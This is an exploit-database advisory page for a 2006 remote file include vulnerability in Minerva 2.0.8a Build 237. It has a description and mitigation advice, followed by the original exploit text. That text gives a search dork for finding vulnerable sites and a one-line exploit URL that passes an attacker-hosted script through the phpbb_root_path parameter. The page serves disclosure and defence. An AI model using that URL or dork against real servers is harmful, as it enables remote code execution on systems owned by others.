header-logo
Suggest Exploit
vendor:
phpbb_root_path
by:
Kacper (a.k.a Rahim)
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: phpbb_root_path
Affected Version From: 2.0.8a Build 237
Affected Version To: 2.0.8a Build 237
Patch Exists: YES
Related CWE: N/A
CPE: minerva:phpbb_root_path:2.0.8a_build_237
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Minerva (phpbb_root_path) <= 2.0.8a Build 237 Remote File Include Vulnerability

Minerva (phpbb_root_path) version 2.0.8a Build 237 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a URL in the phpbb_root_path parameter that points to a malicious file hosted on a remote server. The malicious file is then executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the phpbb_root_path parameter is properly validated and sanitized before being used. Additionally, it is recommended to upgrade to the latest version of Minerva (phpbb_root_path).
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  Minerva (phpbb_root_path) <= 2.0.8a Build 237 Remote File Include Vulnerability
$$  script site: http://sourceforge.net/projects/minerva/
$$  dork: Powered by Minerva 237
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#Expl:


http://www.site.com/[Minerva_path]/stat_modules/users_age/module.php?phpbb_root_path=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-13]

Navigation

Suggest Exploit

Services By CQR